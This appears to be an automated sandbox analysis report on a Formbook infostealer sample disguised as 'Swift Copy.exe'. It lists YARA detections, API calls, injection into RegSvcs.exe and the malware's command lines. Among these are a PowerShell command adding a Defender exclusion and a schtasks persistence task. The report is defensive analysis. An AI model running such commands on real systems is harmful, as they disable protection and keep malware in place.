Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_02338400	0_2_02338400
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_02336FF8	0_2_02336FF8
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_02337330	0_2_02337330
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_02338728	0_2_02338728
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_023384A1	0_2_023384A1
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_0233731E	0_2_0233731E
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_0233736A	0_2_0233736A
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049CAB90	0_2_049CAB90
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049C0548	0_2_049C0548
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049C0EF0	0_2_049C0EF0
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049C0F00	0_2_049C0F00
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049CAB82	0_2_049CAB82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CF900	8_2_018CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DB090	8_2_018DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019920A8	8_2_019920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019928EC	8_2_019928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01981002	8_2_01981002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199E824	8_2_0199E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA830	8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FEBB0	8_2_018FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019803DA	8_2_019803DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198DBD2	8_2_0198DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01992B28	8_2_01992B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EAB40	8_2_018EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019922AE	8_2_019922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197FA2B	8_2_0197FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2581	8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019925DD	8_2_019925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DD5E0	8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01992D07	8_2_01992D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C0D20	8_2_018C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01991D55	8_2_01991D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D841F	8_2_018D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198D466	8_2_0198D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0199DFCE	8_2_0199DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01991FF1	8_2_01991FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01992EF7	8_2_01992EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198D616	8_2_0198D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E6E30	8_2_018E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041FB2A	8_2_0041FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041FBE3	8_2_0041FBE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041F3A5	8_2_0041F3A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: String function: 018CB150 appears 75 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,	8_2_019099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01909910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_019098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909840 NtDelayExecution,LdrInitializeThunk,	8_2_01909840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01909860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_01909A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909A20 NtResumeThread,LdrInitializeThunk,	8_2_01909A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909A50 NtCreateFile,LdrInitializeThunk,	8_2_01909A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019095D0 NtClose,LdrInitializeThunk,	8_2_019095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909540 NtReadFile,LdrInitializeThunk,	8_2_01909540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909780 NtMapViewOfSection,LdrInitializeThunk,	8_2_01909780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_019097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909FE0 NtCreateMutant,LdrInitializeThunk,	8_2_01909FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909710 NtQueryInformationToken,LdrInitializeThunk,	8_2_01909710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_019096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01909660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019099D0 NtCreateProcessEx,	8_2_019099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909950 NtQueueApcThread,	8_2_01909950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019098A0 NtWriteVirtualMemory,	8_2_019098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909820 NtEnumerateKey,	8_2_01909820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190B040 NtSuspendThread,	8_2_0190B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190A3B0 NtGetContextThread,	8_2_0190A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909B00 NtSetValueKey,	8_2_01909B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909A80 NtOpenDirectoryObject,	8_2_01909A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909A10 NtQuerySection,	8_2_01909A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019095F0 NtQueryInformationFile,	8_2_019095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190AD30 NtSetContextThread,	8_2_0190AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909520 NtWaitForSingleObject,	8_2_01909520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909560 NtWriteFile,	8_2_01909560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190A710 NtOpenProcessToken,	8_2_0190A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909730 NtQueryVirtualMemory,	8_2_01909730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190A770 NtOpenThread,	8_2_0190A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909770 NtSetInformationFile,	8_2_01909770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909760 NtOpenProcess,	8_2_01909760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019096D0 NtCreateKey,	8_2_019096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909610 NtEnumerateValueKey,	8_2_01909610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909650 NtQueryValueKey,	8_2_01909650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01909670 NtQueryInformationProcess,	8_2_01909670

Source: Swift Copy.exe, 00000000.00000002.295533138.0000000007180000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295486432.0000000007030000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000003.256962954.0000000006ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295288775.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.284608017.00000000023EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000000.237305228.000000000011A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
Source: Swift Copy.exe	Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe

Source: Swift Copy.exe	Virustotal: Detection: 21%
Source: Swift Copy.exe	ReversingLabs: Detection: 19%

Source: C:\Users\user\Desktop\Swift Copy.exe

File read: C:\Users\user\Desktop\Swift Copy.exe

Jump to behavior

Source: Swift Copy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Swift Copy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe

File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE16E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/9@6/5

Source: C:\Users\user\Desktop\Swift Copy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Swift Copy.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Swift Copy.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Users\user\Desktop\Swift Copy.exe	Mutant created: \Sessions\1\BaseNamedObjects\qLSjiKzPfybrIOdxeHK

Source: Swift Copy.exe, u000fu2004.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Swift Copy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Swift Copy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Swift Copy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Swift Copy.exe, u000fu2004.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_0233E250 pushad ; ret	0_2_0233E251
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049C2057 push ebx; retf	0_2_049C207A
Source: C:\Users\user\Desktop\Swift Copy.exe	Code function: 0_2_049C7732 push 2400005Eh; retf	0_2_049C7741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0191D0D1 push ecx; ret	8_2_0191D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0041F358 push dword ptr [4E772C75h]; ret	8_2_0041F375

Source: initial sample	Static PE information: section name: .text entropy: 7.431867015823937
Source: initial sample	Static PE information: section name: .text entropy: 7.431867015823937

Source: C:\Users\user\Desktop\Swift Copy.exe

File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Swift Copy.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp

Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
